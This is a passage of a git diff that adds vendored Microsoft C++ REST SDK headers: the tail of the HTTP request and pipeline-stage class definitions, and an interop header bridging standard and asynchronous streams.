response); + + pplx::task get_response() { return pplx::task(m_response); } + + _ASYNCRTIMP pplx::task _reply_if_not_already(http::status_code status); + + void set_response_stream(const concurrency::streams::ostream& stream) { m_response_stream = stream; } + + void set_progress_handler(const progress_handler& handler) + { + m_progress_handler = std::make_shared(handler); + } + + const concurrency::streams::ostream& _response_stream() const { return m_response_stream; } + + const std::shared_ptr& _progress_handler() const { return m_progress_handler; } + + http::details::_http_server_context* _get_server_context() const { return m_server_context.get(); } + + void _set_server_context(std::unique_ptr server_context) + { + m_server_context = std::move(server_context); + } + + void _set_listener_path(const utility::string_t& path) { m_listener_path = path; } + + void _set_base_uri(const http::uri& base_uri) { m_base_uri = base_uri; } + + void _set_remote_address(const utility::string_t& remote_address) { m_remote_address = remote_address; } + +private: + // Actual initiates sending the response, without checking if a response has already been sent. + pplx::task _reply_impl(http_response response); + + http::method m_method; + + // Tracks whether or not a response has already been started for this message. + // 0 = No reply sent + // 1 = Usual reply sent + // 2 = Reply aborted by another thread; e.g. server shutdown + pplx::details::atomic_long m_initiated_response; + + std::unique_ptr m_server_context; + + pplx::cancellation_token m_cancellationToken; + + http::uri m_base_uri; + http::uri m_uri; + utility::string_t m_listener_path; + + concurrency::streams::ostream m_response_stream; + + std::shared_ptr m_progress_handler; + + pplx::task_completion_event m_response; + + utility::string_t m_remote_address; +}; + +} // namespace details + +/// +/// Represents an HTTP request. +/// +class http_request +{ +public: + /// + /// Constructs a new HTTP request with the 'GET' method. + /// + http_request() : _m_impl(std::make_shared(methods::GET)) {} + + /// + /// Constructs a new HTTP request with the given request method. + /// + /// Request method. + http_request(http::method mtd) : _m_impl(std::make_shared(std::move(mtd))) {} + + /// + /// Destructor frees any held resources. + /// + ~http_request() {} + + /// + /// Get the method (GET/PUT/POST/DELETE) of the request message. + /// + /// Request method of this HTTP request. + const http::method& method() const { return _m_impl->method(); } + + /// + /// Set the method (GET/PUT/POST/DELETE) of the request message. + /// + /// Request method of this HTTP request. + void set_method(const http::method& method) const { _m_impl->method() = method; } + + /// + /// Get the underling URI of the request message. + /// + /// The uri of this message. + const uri& request_uri() const { return _m_impl->request_uri(); } + + /// + /// Set the underling URI of the request message. + /// + /// The uri for this message. + void set_request_uri(const uri& uri) { return _m_impl->set_request_uri(uri); } + + /// + /// Gets a reference the URI path, query, and fragment part of this request message. + /// This will be appended to the base URI specified at construction of the http_client. + /// + /// A string. + /// When the request is the one passed to a listener's handler, the + /// relative URI is the request URI less the listener's path. In all other circumstances, + /// request_uri() and relative_uri() will return the same value. + /// + uri relative_uri() const { return _m_impl->relative_uri(); } + + /// + /// Get an absolute URI with scheme, host, port, path, query, and fragment part of + /// the request message. + /// + /// Absolute URI is only valid after this http_request object has been passed + /// to http_client::request(). + /// + uri absolute_uri() const { return _m_impl->absolute_uri(); } + + /// + /// Gets a reference to the headers of the response message. + /// + /// HTTP headers for this response. + /// + /// Use the http_headers::add to fill in desired headers. + /// + http_headers& headers() { return _m_impl->headers(); } + + /// + /// Gets a const reference to the headers of the response message. + /// + /// HTTP headers for this response. + /// + /// Use the http_headers::add to fill in desired headers. + /// + const http_headers& headers() const { return _m_impl->headers(); } + + /// + /// Returns the HTTP protocol version of this request message. + /// + /// The HTTP protocol version. + http::http_version http_version() const { return _m_impl->http_version(); } + + /// + /// Returns a string representation of the remote IP address. + /// + /// The remote IP address. + const utility::string_t& remote_address() const { return _m_impl->remote_address(); } + + CASABLANCA_DEPRECATED("Use `remote_address()` instead.") + const utility::string_t& get_remote_address() const { return _m_impl->remote_address(); } + + /// + /// Extract the body of the request message as a string value, checking that the content type is a MIME text type. + /// A body can only be extracted once because in some cases an optimization is made where the data is 'moved' out. + /// + /// If true, ignores the Content-Type header and assumes UTF-8. + /// String containing body of the message. + pplx::task extract_string(bool ignore_content_type = false) + { + auto impl = _m_impl; + return pplx::create_task(_m_impl->_get_data_available()).then([impl, ignore_content_type](utility::size64_t) { + return impl->extract_string(ignore_content_type); + }); + } + + /// + /// Extract the body of the request message as a UTF-8 string value, checking that the content type is a MIME text + /// type. A body can only be extracted once because in some cases an optimization is made where the data is 'moved' + /// out. + /// + /// If true, ignores the Content-Type header and assumes UTF-8. + /// String containing body of the message. + pplx::task extract_utf8string(bool ignore_content_type = false) + { + auto impl = _m_impl; + return pplx::create_task(_m_impl->_get_data_available()).then([impl, ignore_content_type](utility::size64_t) { + return impl->extract_utf8string(ignore_content_type); + }); + } + + /// + /// Extract the body of the request message as a UTF-16 string value, checking that the content type is a MIME text + /// type. A body can only be extracted once because in some cases an optimization is made where the data is 'moved' + /// out. + /// + /// If true, ignores the Content-Type header and assumes UTF-16. + /// String containing body of the message. + pplx::task extract_utf16string(bool ignore_content_type = false) + { + auto impl = _m_impl; + return pplx::create_task(_m_impl->_get_data_available()).then([impl, ignore_content_type](utility::size64_t) { + return impl->extract_utf16string(ignore_content_type); + }); + } + + /// + /// Extracts the body of the request message into a json value, checking that the content type is application/json. + /// A body can only be extracted once because in some cases an optimization is made where the data is 'moved' out. + /// + /// If true, ignores the Content-Type header and assumes UTF-8. + /// JSON value from the body of this message. + pplx::task extract_json(bool ignore_content_type = false) const + { + auto impl = _m_impl; + return pplx::create_task(_m_impl->_get_data_available()).then([impl, ignore_content_type](utility::size64_t) { + return impl->_extract_json(ignore_content_type); + }); + } + + /// + /// Extract the body of the response message into a vector of bytes. Extracting a vector can be done on + /// + /// The body of the message as a vector of bytes. + pplx::task> extract_vector() const + { + auto impl = _m_impl; + return pplx::create_task(_m_impl->_get_data_available()).then([impl](utility::size64_t) { + return impl->_extract_vector(); + }); + } + + /// + /// Sets the body of the message to a textual string and set the "Content-Type" header. Assumes + /// the character encoding of the string is UTF-8. + /// + /// String containing body text. + /// MIME type to set the "Content-Type" header to. Default to "text/plain; + /// charset=utf-8". This will overwrite any previously set body data and "Content-Type" header. + /// + void set_body(utf8string&& body_text, const utf8string& content_type = utf8string("text/plain; charset=utf-8")) + { + const auto length = body_text.size(); + _m_impl->set_body( + concurrency::streams::bytestream::open_istream(std::move(body_text)), length, content_type); + } + + /// + /// Sets the body of the message to a textual string and set the "Content-Type" header. Assumes + /// the character encoding of the string is UTF-8. + /// + /// String containing body text. + /// MIME type to set the "Content-Type" header to. Default to "text/plain; + /// charset=utf-8". This will overwrite any previously set body data and "Content-Type" header. + /// + void set_body(const utf8string& body_text, const utf8string& content_type = utf8string("text/plain; charset=utf-8")) + { + _m_impl->set_body( + concurrency::streams::bytestream::open_istream(body_text), body_text.size(), content_type); + } + + /// + /// Sets the body of the message to a textual string and set the "Content-Type" header. Assumes + /// the character encoding of the string is UTF-16 will perform conversion to UTF-8. + /// + /// + /// String containing body text. + /// MIME type to set the "Content-Type" header to. Default to "text/plain". + /// + /// This will overwrite any previously set body data and "Content-Type" header. + /// + void set_body(const utf16string& body_text, + utf16string content_type = utility::conversions::to_utf16string("text/plain")) + { + if (content_type.find(::utility::conversions::to_utf16string("charset=")) != content_type.npos) + { + throw std::invalid_argument("content_type can't contain a 'charset'."); + } + + auto utf8body = utility::conversions::utf16_to_utf8(body_text); + auto length = utf8body.size(); + _m_impl->set_body(concurrency::streams::bytestream::open_istream(std::move(utf8body)), + length, + std::move(content_type.append(::utility::conversions::to_utf16string("; charset=utf-8")))); + } + + /// + /// Sets the body of the message to contain json value. If the 'Content-Type' + /// header hasn't already been set it will be set to 'application/json'. + /// + /// json value. + /// + /// This will overwrite any previously set body data. + /// + void set_body(const json::value& body_data) + { + auto body_text = utility::conversions::to_utf8string(body_data.serialize()); + auto length = body_text.size(); + _m_impl->set_body(concurrency::streams::bytestream::open_istream(std::move(body_text)), + length, + _XPLATSTR("application/json")); + } + + /// + /// Sets the body of the message to the contents of a byte vector. If the 'Content-Type' + /// header hasn't already been set it will be set to 'application/octet-stream'. + /// + /// Vector containing body data. + /// + /// This will overwrite any previously set body data. + /// + void set_body(std::vector&& body_data) + { + auto length = body_data.size(); + _m_impl->set_body(concurrency::streams::bytestream::open_istream(std::move(body_data)), + length, + _XPLATSTR("application/octet-stream")); + } + + /// + /// Sets the body of the message to the contents of a byte vector. If the 'Content-Type' + /// header hasn't already been set it will be set to 'application/octet-stream'. + /// + /// Vector containing body data. + /// + /// This will overwrite any previously set body data. + /// + void set_body(const std::vector& body_data) + { + set_body(concurrency::streams::bytestream::open_istream(body_data), body_data.size()); + } + + /// + /// Defines a stream that will be relied on to provide the body of the HTTP message when it is + /// sent. + /// + /// A readable, open asynchronous stream. + /// A string holding the MIME type of the message body. + /// + /// This cannot be used in conjunction with any other means of setting the body of the request. + /// The stream will not be read until the message is sent. + /// + void set_body(const concurrency::streams::istream& stream, + const utility::string_t& content_type = _XPLATSTR("application/octet-stream")) + { + _m_impl->set_body(stream, content_type); + } + + /// + /// Defines a stream that will be relied on to provide the body of the HTTP message when it is + /// sent. + /// + /// A readable, open asynchronous stream. + /// The size of the data to be sent in the body. + /// A string holding the MIME type of the message body. + /// + /// This cannot be used in conjunction with any other means of setting the body of the request. + /// The stream will not be read until the message is sent. + /// + void set_body(const concurrency::streams::istream& stream, + utility::size64_t content_length, + const utility::string_t& content_type = _XPLATSTR("application/octet-stream")) + { + _m_impl->set_body(stream, content_length, content_type); + } + + /// + /// Produces a stream which the caller may use to retrieve data from an incoming request. + /// + /// A readable, open asynchronous stream. + /// + /// This cannot be used in conjunction with any other means of getting the body of the request. + /// It is not necessary to wait until the message has been sent before starting to write to the + /// stream, but it is advisable to do so, since it will allow the network I/O to start earlier + /// and the work of sending data can be overlapped with the production of more data. + /// + concurrency::streams::istream body() const { return _m_impl->instream(); } + + /// + /// Defines a stream that will be relied on to hold the body of the HTTP response message that + /// results from the request. + /// + /// A writable, open asynchronous stream. + /// + /// If this function is called, the body of the response should not be accessed in any other + /// way. + /// + void set_response_stream(const concurrency::streams::ostream& stream) + { + return _m_impl->set_response_stream(stream); + } + + /// + /// Sets a compressor that will be used to compress the body of the HTTP message as it is sent. + /// + /// A pointer to an instantiated compressor of the desired type. + /// + /// This cannot be used in conjunction with any external means of compression. The Transfer-Encoding + /// header will be managed internally, and must not be set by the client. + /// + void set_compressor(std::unique_ptr compressor) + { + return _m_impl->set_compressor(std::move(compressor)); + } + + /// + /// Sets a compressor that will be used to compress the body of the HTTP message as it is sent. + /// + /// The built-in compression algorithm to use. + /// + /// True if a built-in compressor was instantiated, otherwise false. + /// + /// + /// This cannot be used in conjunction with any external means of compression. The Transfer-Encoding + /// header will be managed internally, and must not be set by the client. + /// + bool set_compressor(utility::string_t algorithm) + { + _m_impl->set_compressor(http::compression::builtin::make_compressor(algorithm)); + return (bool)_m_impl->compressor(); + } + + /// + /// Gets the compressor to be used to compress the message body, if any. + /// + /// + /// The compressor itself. + /// + std::unique_ptr& compressor() { return _m_impl->compressor(); } + + /// + /// Sets the default collection of built-in factory classes for decompressors that may be used to + /// decompress the body of the HTTP message as it is received, effectively enabling decompression. + /// + /// The collection of factory classes for allowable decompressors. The + /// supplied vector itself need not remain valid after the call returns. + /// + /// This default collection is implied if request_compressed_response() is set in the associated + /// client::http_client_config and neither overload of this method has been called. + /// + /// This cannot be used in conjunction with any external means of decompression. The TE and Accept-Encoding + /// headers must not be set by the client, as they will be managed internally as appropriate. + /// + _ASYNCRTIMP void set_decompress_factories(); + + /// + /// Sets a collection of factory classes for decompressors that may be used to decompress the + /// body of the HTTP message as it is received, effectively enabling decompression. + /// + /// + /// If set, this collection takes the place of the built-in compression providers. It may contain + /// custom factory classes and/or factory classes for built-in providers, and may be used to adjust + /// the weights of the built-in providers, which default to 500 (i.e. "q=0.500"). + /// + /// This cannot be used in conjunction with any external means of decompression. The TE and Accept-Encoding + /// headers must not be set by the client, as they will be managed internally as appropriate. + /// + void set_decompress_factories(const std::vector>& factories) + { + return _m_impl->set_decompress_factories(factories); + } + + /// + /// Gets the collection of factory classes for decompressors to be used to decompress the message body, if any. + /// + /// + /// The collection of factory classes itself. + /// + /// + /// This cannot be used in conjunction with any external means of decompression. The TE + /// header must not be set by the client, as it will be managed internally. + /// + const std::vector>& decompress_factories() const + { + return _m_impl->decompress_factories(); + } + + /// + /// Defines a callback function that will be invoked for every chunk of data uploaded or downloaded + /// as part of the request. + /// + /// A function representing the progress handler. It's parameters are: + /// up: a message_direction::direction value indicating the direction of the message + /// that is being reported. + /// progress: the number of bytes that have been processed so far. + /// + /// + /// This function will be called at least once for upload and at least once for + /// the download body, unless there is some exception generated. An HTTP message with an error + /// code is not an exception. This means, that even if there is no body, the progress handler + /// will be called. + /// + /// Setting the chunk size on the http_client does not guarantee that the client will be using + /// exactly that increment for uploading and downloading data. + /// + /// The handler will be called only once for each combination of argument values, in order. Depending + /// on how a service responds, some download values may come before all upload values have been + /// reported. + /// + /// The progress handler will be called on the thread processing the request. This means that + /// the implementation of the handler must take care not to block the thread or do anything + /// that takes significant amounts of time. In particular, do not do any kind of I/O from within + /// the handler, do not update user interfaces, and to not acquire any locks. If such activities + /// are necessary, it is the handler's responsibility to execute that work on a separate thread. + /// + void set_progress_handler(const progress_handler& handler) { return _m_impl->set_progress_handler(handler); } + + /// + /// Asynchronously responses to this HTTP request. + /// + /// Response to send. + /// An asynchronous operation that is completed once response is sent. + pplx::task reply(const http_response& response) const { return _m_impl->reply(response); } + + /// + /// Asynchronously responses to this HTTP request. + /// + /// Response status code. + /// An asynchronous operation that is completed once response is sent. + pplx::task reply(http::status_code status) const { return reply(http_response(status)); } + + /// + /// Responds to this HTTP request. + /// + /// Response status code. + /// Json value to use in the response body. + /// An asynchronous operation that is completed once response is sent. + pplx::task reply(http::status_code status, const json::value& body_data) const + { + http_response response(status); + response.set_body(body_data); + return reply(response); + } + + /// Responds to this HTTP request with a string. + /// Assumes the character encoding of the string is UTF-8. + /// + /// Response status code. + /// UTF-8 string containing the text to use in the response body. + /// Content type of the body. + /// An asynchronous operation that is completed once response is sent. + /// + // Callers of this function do NOT need to block waiting for the response to be + /// sent to before the body data is destroyed or goes out of scope. + /// + pplx::task reply(http::status_code status, + utf8string&& body_data, + const utf8string& content_type = "text/plain; charset=utf-8") const + { + http_response response(status); + response.set_body(std::move(body_data), content_type); + return reply(response); + } + + /// + /// Responds to this HTTP request with a string. + /// Assumes the character encoding of the string is UTF-8. + /// + /// Response status code. + /// UTF-8 string containing the text to use in the response body. + /// Content type of the body. + /// An asynchronous operation that is completed once response is sent. + /// + // Callers of this function do NOT need to block waiting for the response to be + /// sent to before the body data is destroyed or goes out of scope. + /// + pplx::task reply(http::status_code status, + const utf8string& body_data, + const utf8string& content_type = "text/plain; charset=utf-8") const + { + http_response response(status); + response.set_body(body_data, content_type); + return reply(response); + } + + /// + /// Responds to this HTTP request with a string. Assumes the character encoding + /// of the string is UTF-16 will perform conversion to UTF-8. + /// + /// Response status code. + /// UTF-16 string containing the text to use in the response body. + /// Content type of the body. + /// An asynchronous operation that is completed once response is sent. + /// + // Callers of this function do NOT need to block waiting for the response to be + /// sent to before the body data is destroyed or goes out of scope. + /// + pplx::task reply(http::status_code status, + const utf16string& body_data, + const utf16string& content_type = utility::conversions::to_utf16string("text/plain")) const + { + http_response response(status); + response.set_body(body_data, content_type); + return reply(response); + } + + /// + /// Responds to this HTTP request. + /// + /// Response status code. + /// A string holding the MIME type of the message body. + /// An asynchronous stream representing the body data. + /// A task that is completed once a response from the request is received. + pplx::task reply(status_code status, + const concurrency::streams::istream& body, + const utility::string_t& content_type = _XPLATSTR("application/octet-stream")) const + { + http_response response(status); + response.set_body(body, content_type); + return reply(response); + } + + /// + /// Responds to this HTTP request. + /// + /// Response status code. + /// The size of the data to be sent in the body.. + /// A string holding the MIME type of the message body. + /// An asynchronous stream representing the body data. + /// A task that is completed once a response from the request is received. + pplx::task reply(status_code status, + const concurrency::streams::istream& body, + utility::size64_t content_length, + const utility::string_t& content_type = _XPLATSTR("application/octet-stream")) const + { + http_response response(status); + response.set_body(body, content_length, content_type); + return reply(response); + } + + /// + /// Signals the user (listener) when all the data for this request message has been received. + /// + /// A task which is completed when all of the response body has been received + pplx::task content_ready() const + { + http_request req = *this; + return pplx::create_task(_m_impl->_get_data_available()).then([req](utility::size64_t) mutable { return req; }); + } + + /// + /// Gets a task representing the response that will eventually be sent. + /// + /// A task that is completed once response is sent. + pplx::task get_response() const { return _m_impl->get_response(); } + + /// + /// Generates a string representation of the message, including the body when possible. + /// Mainly this should be used for debugging purposes as it has to copy the + /// message body and doesn't have excellent performance. + /// + /// A string representation of this HTTP request. + /// Note this function is synchronous and doesn't wait for the + /// entire message body to arrive. If the message body has arrived by the time this + /// function is called and it is has a textual Content-Type it will be included. + /// Otherwise just the headers will be present. + utility::string_t to_string() const { return _m_impl->to_string(); } + + /// + /// Sends a response if one has not already been sent. + /// + pplx::task _reply_if_not_already(status_code status) { return _m_impl->_reply_if_not_already(status); } + + /// + /// Gets the server context associated with this HTTP message. + /// + http::details::_http_server_context* _get_server_context() const { return _m_impl->_get_server_context(); } + + /// + /// These are used for the initial creation of the HTTP request. + /// + static http_request _create_request(std::unique_ptr server_context) + { + return http_request(std::move(server_context)); + } + void _set_server_context(std::unique_ptr server_context) + { + _m_impl->_set_server_context(std::move(server_context)); + } + + void _set_listener_path(const utility::string_t& path) { _m_impl->_set_listener_path(path); } + + const std::shared_ptr& _get_impl() const { return _m_impl; } + + void _set_cancellation_token(const pplx::cancellation_token& token) { _m_impl->set_cancellation_token(token); } + + const pplx::cancellation_token& _cancellation_token() const { return _m_impl->cancellation_token(); } + + void _set_base_uri(const http::uri& base_uri) { _m_impl->_set_base_uri(base_uri); } + +private: + friend class http::details::_http_request; + friend class http::client::http_client; + + http_request(std::unique_ptr server_context) + : _m_impl(std::make_shared(std::move(server_context))) + { + } + + std::shared_ptr _m_impl; +}; + +namespace client +{ +class http_pipeline; +} + +/// +/// HTTP client handler class, used to represent an HTTP pipeline stage. +/// +/// +/// When a request goes out, it passes through a series of stages, customizable by +/// the application and/or libraries. The default stage will interact with lower-level +/// communication layers to actually send the message on the network. When creating a client +/// instance, an application may add pipeline stages in front of the already existing +/// stages. Each stage has a reference to the next stage available in the value. +/// +class http_pipeline_stage : public std::enable_shared_from_this +{ +public: + http_pipeline_stage() = default; + + http_pipeline_stage& operator=(const http_pipeline_stage&) = delete; + http_pipeline_stage(const http_pipeline_stage&) = delete; + + virtual ~http_pipeline_stage() = default; + + /// + /// Runs this stage against the given request and passes onto the next stage. + /// + /// The HTTP request. + /// A task of the HTTP response. + virtual pplx::task propagate(http_request request) = 0; + +protected: + /// + /// Gets the next stage in the pipeline. + /// + /// A shared pointer to a pipeline stage. + const std::shared_ptr& next_stage() const { return m_next_stage; } + + /// + /// Gets a shared pointer to this pipeline stage. + /// + /// A shared pointer to a pipeline stage. + CASABLANCA_DEPRECATED("This api is redundant. Use 'shared_from_this()' directly instead.") + std::shared_ptr current_stage() { return this->shared_from_this(); } + +private: + friend class ::web::http::client::http_pipeline; + + void set_next_stage(const std::shared_ptr& next) { m_next_stage = next; } + + std::shared_ptr m_next_stage; +}; + +} // namespace http +} // namespace web diff --git a/Src/Common/CppRestSdk/include/cpprest/interopstream.h b/Src/Common/CppRestSdk/include/cpprest/interopstream.h new file mode 100644 index 0000000..0b88d3a --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/interopstream.h @@ -0,0 +1,554 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * Adapter classes for async and STD stream buffers, used to connect std-based and async-based APIs. + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ +#pragma once + +#include "Common/CppRestSdk/include/cpprest/astreambuf.h" +#include "Common/CppRestSdk/include/cpprest/streams.h" +#include "Common/CppRestSdk/include/pplx/pplxtasks.h" + +#if defined(_WIN32) +#pragma warning(push) +#pragma warning(disable : 4250) +#endif + +namespace Concurrency +{ +namespace streams +{ +template +class stdio_ostream; +template +class stdio_istream; + +namespace details +{ +/// +/// The basic_stdio_buffer class serves to support interoperability with STL stream buffers. +/// Sitting atop a std::streambuf, which does all the I/O, instances of this class may read +/// and write data to standard iostreams. The class itself should not be used in application +/// code, it is used by the stream definitions farther down in the header file. +/// +template +class basic_stdio_buffer : public streambuf_state_manager<_CharType> +{ + typedef concurrency::streams::char_traits<_CharType> traits; + typedef typename traits::int_type int_type; + typedef typename traits::pos_type pos_type; + typedef typename traits::off_type off_type; + /// + /// Private constructor + /// + basic_stdio_buffer(_In_ std::basic_streambuf<_CharType>* streambuf, std::ios_base::openmode mode) + : streambuf_state_manager<_CharType>(mode), m_buffer(streambuf) + { + } + +public: + /// + /// Destructor + /// + virtual ~basic_stdio_buffer() + { + this->_close_read(); + this->_close_write(); + } + +private: + // + // The functions overridden below here are documented elsewhere. + // See astreambuf.h for further information. + // + virtual bool can_seek() const { return this->is_open(); } + virtual bool has_size() const { return false; } + + virtual size_t in_avail() const { return (size_t)m_buffer->in_avail(); } + + virtual size_t buffer_size(std::ios_base::openmode) const { return 0; } + virtual void set_buffer_size(size_t, std::ios_base::openmode) { return; } + + virtual pplx::task _sync() { return pplx::task_from_result(m_buffer->pubsync() == 0); } + + virtual pplx::task _putc(_CharType ch) { return pplx::task_from_result(m_buffer->sputc(ch)); } + virtual pplx::task _putn(const _CharType* ptr, size_t size) + { + return pplx::task_from_result((size_t)m_buffer->sputn(ptr, size)); + } + + size_t _sgetn(_Out_writes_(size) _CharType* ptr, _In_ size_t size) const { return m_buffer->sgetn(ptr, size); } + virtual size_t _scopy(_Out_writes_(size) _CharType*, _In_ size_t size) + { + (void)(size); + return (size_t)-1; + } + + virtual pplx::task _getn(_Out_writes_(size) _CharType* ptr, _In_ size_t size) + { + return pplx::task_from_result((size_t)m_buffer->sgetn(ptr, size)); + } + + virtual int_type _sbumpc() { return m_buffer->sbumpc(); } + virtual int_type _sgetc() { return m_buffer->sgetc(); } + + virtual pplx::task _bumpc() { return pplx::task_from_result(m_buffer->sbumpc()); } + virtual pplx::task _getc() { return pplx::task_from_result(m_buffer->sgetc()); } + virtual pplx::task _nextc() { return pplx::task_from_result(m_buffer->snextc()); } + virtual pplx::task _ungetc() { return pplx::task_from_result(m_buffer->sungetc()); } + + virtual pos_type getpos(std::ios_base::openmode mode) const + { + return m_buffer->pubseekoff(0, std::ios_base::cur, mode); + } + virtual pos_type seekpos(pos_type pos, std::ios_base::openmode mode) { return m_buffer->pubseekpos(pos, mode); } + virtual pos_type seekoff(off_type off, std::ios_base::seekdir dir, std::ios_base::openmode mode) + { + return m_buffer->pubseekoff(off, dir, mode); + } + + virtual _CharType* _alloc(size_t) { return nullptr; } + virtual void _commit(size_t) {} + + virtual bool acquire(_CharType*&, size_t&) { return false; } + virtual void release(_CharType*, size_t) {} + + template + friend class concurrency::streams::stdio_ostream; + template + friend class concurrency::streams::stdio_istream; + + std::basic_streambuf<_CharType>* m_buffer; +}; + +} // namespace details + +/// +/// stdio_ostream represents an async ostream derived from a standard synchronous stream, as +/// defined by the "std" namespace. It is constructed from a reference to a standard stream, which +/// must be valid for the lifetime of the asynchronous stream. +/// +/// +/// The data type of the basic element of the stdio_ostream. +/// +/// +/// Since std streams are not reference-counted, great care must be taken by an application to make +/// sure that the std stream does not get destroyed until all uses of the asynchronous stream are +/// done and have been serviced. +/// +template +class stdio_ostream : public basic_ostream +{ +public: + /// + /// Constructor + /// + /// + /// The data type of the basic element of the source output stream. + /// + /// The synchronous stream that this is using for its I/O + template + stdio_ostream(std::basic_ostream& stream) + : basic_ostream( + streams::streambuf(std::shared_ptr>( + new details::basic_stdio_buffer(stream.rdbuf(), std::ios_base::out)))) + { + } + + /// + /// Copy constructor + /// + /// The source object + stdio_ostream(const stdio_ostream& other) : basic_ostream(other) {} + + /// + /// Assignment operator + /// + /// The source object + /// A reference to the output stream object that contains the result of the assignment. + stdio_ostream& operator=(const stdio_ostream& other) + { + basic_ostream::operator=(other); + return *this; + } +}; + +/// +/// stdio_istream represents an async istream derived from a standard synchronous stream, as +/// defined by the "std" namespace. It is constructed from a reference to a standard stream, which +/// must be valid for the lifetime of the asynchronous stream. +/// +/// +/// The data type of the basic element of the stdio_istream. +/// +/// +/// Since std streams are not reference-counted, great care must be taken by an application to make +/// sure that the std stream does not get destroyed until all uses of the asynchronous stream are +/// done and have been serviced. +/// +template +class stdio_istream : public basic_istream +{ +public: + /// + /// Constructor + /// + /// + /// The data type of the basic element of the source istream + /// + /// The synchronous stream that this is using for its I/O + template + stdio_istream(std::basic_istream& stream) + : basic_istream( + streams::streambuf(std::shared_ptr>( + new details::basic_stdio_buffer(stream.rdbuf(), std::ios_base::in)))) + { + } + + /// + /// Copy constructor + /// + /// The source object + stdio_istream(const stdio_istream& other) : basic_istream(other) {} + + /// + /// Assignment operator + /// + /// The source object + /// A reference to the input stream object that contains the result of the assignment. + stdio_istream& operator=(const stdio_istream& other) + { + basic_istream::operator=(other); + return *this; + } +}; + +namespace details +{ +/// +/// IO streams stream buffer implementation used to interface with an async streambuffer underneath. +/// Used for implementing the standard synchronous streams that provide interop between std:: and concurrency::streams:: +/// +template +class basic_async_streambuf : public std::basic_streambuf +{ +public: + typedef concurrency::streams::char_traits traits; + typedef typename traits::int_type int_type; + typedef typename traits::pos_type pos_type; + typedef typename traits::off_type off_type; + + basic_async_streambuf(const streams::streambuf& async_buf) : m_buffer(async_buf) {} + +protected: + // + // The following are the functions in std::basic_streambuf that we need to override. + // + + /// + /// Writes one byte to the stream buffer. + /// + int_type overflow(int_type ch) + { + try + { + return m_buffer.putc(CharType(ch)).get(); + } + catch (...) + { + return traits::eof(); + } + } + + /// + /// Gets one byte from the stream buffer without moving the read position. + /// + int_type underflow() + { + try + { + return m_buffer.getc().get(); + } + catch (...) + { + return traits::eof(); + } + } + + /// + /// Gets one byte from the stream buffer and move the read position one character. + /// + int_type uflow() + { + try + { + return m_buffer.bumpc().get(); + } + catch (...) + { + return traits::eof(); + } + } + + /// + /// Gets a number of characters from the buffer and place it into the provided memory block. + /// + std::streamsize xsgetn(_Out_writes_(count) CharType* ptr, _In_ std::streamsize count) + { + size_t cnt = size_t(count); + size_t read_so_far = 0; + + try + { + while (read_so_far < cnt) + { + size_t rd = m_buffer.getn(ptr + read_so_far, cnt - read_so_far).get(); + read_so_far += rd; + if (rd == 0) break; + } + return read_so_far; + } + catch (...) + { + return 0; + } + } + + /// + /// Writes a given number of characters from the provided block into the stream buffer. + /// + std::streamsize xsputn(const CharType* ptr, std::streamsize count) + { + try + { + return m_buffer.putn_nocopy(ptr, static_cast(count)).get(); + } + catch (...) + { + return 0; + } + } + + /// + /// Synchronizes with the underlying medium. + /// + int sync() // must be int as per std::basic_streambuf + { + try + { + m_buffer.sync().wait(); + } + catch (...) + { + } + return 0; + } + + /// + /// Seeks to the given offset relative to the beginning, end, or current position. + /// + pos_type seekoff(off_type offset, + std::ios_base::seekdir dir, + std::ios_base::openmode mode = std::ios_base::in | std::ios_base::out) + { + try + { + if (dir == std::ios_base::cur && offset == 0) // Special case for getting the current position. + return m_buffer.getpos(mode); + return m_buffer.seekoff(offset, dir, mode); + } + catch (...) + { + return (pos_type(-1)); + } + } + + /// + /// Seeks to the given offset relative to the beginning of the stream. + /// + pos_type seekpos(pos_type pos, std::ios_base::openmode mode = std::ios_base::in | std::ios_base::out) + { + try + { + return m_buffer.seekpos(pos, mode); + } + catch (...) + { + return (pos_type(-1)); + } + } + +private: + concurrency::streams::streambuf m_buffer; +}; + +} // namespace details + +/// +/// A concrete STL ostream which relies on an asynchronous stream for its I/O. +/// +/// +/// The data type of the basic element of the stream. +/// +template +class async_ostream : public std::basic_ostream +{ +public: + /// + /// Constructor + /// + /// + /// The data type of the basic element of the source ostream. + /// + /// The asynchronous stream whose stream buffer should be used for I/O + template + async_ostream(const streams::basic_ostream& astream) + : std::basic_ostream(&m_strbuf), m_strbuf(astream.streambuf()) + { + } + + /// + /// Constructor + /// + /// + /// The data type of the basic element of the source streambuf. + /// + /// The asynchronous stream buffer to use for I/O + template + async_ostream(const streams::streambuf& strbuf) + : std::basic_ostream(&m_strbuf), m_strbuf(strbuf) + { + } + +private: + details::basic_async_streambuf m_strbuf; +}; + +/// +/// A concrete STL istream which relies on an asynchronous stream for its I/O. +/// +/// +/// The data type of the basic element of the stream. +/// +template +class async_istream : public std::basic_istream +{ +public: + /// + /// Constructor + /// + /// + /// The data type of the basic element of the source istream. + /// + /// The asynchronous stream whose stream buffer should be used for I/O + template + async_istream(const streams::basic_istream& astream) + : std::basic_istream(&m_strbuf), m_strbuf(astream.streambuf()) + { + } + + /// + /// Constructor + /// + /// + /// The data type of the basic element of the source streambuf. + /// + /// The asynchronous stream buffer to use for I/O + template + async_istream(const streams::streambuf& strbuf) + : std::basic_istream(&m_strbuf), m_strbuf(strbuf) + { + } + +private: + details::basic_async_streambuf m_strbuf; +}; + +/// +/// A concrete STL istream which relies on an asynchronous stream buffer for its I/O. +/// +/// +/// The data type of the basic element of the stream. +/// +template +class async_iostream : public std::basic_iostream +{ +public: + /// + /// Constructor + /// + /// The asynchronous stream buffer to use for I/O + async_iostream(const streams::streambuf& strbuf) + : std::basic_iostream(&m_strbuf), m_strbuf(strbuf) + { + } + +private: + details::basic_async_streambuf m_strbuf; +}; + +#if defined(__cplusplus_winrt) + +/// +/// Static class containing factory functions for WinRT streams implemented on top of Casablanca async streams. +/// +/// 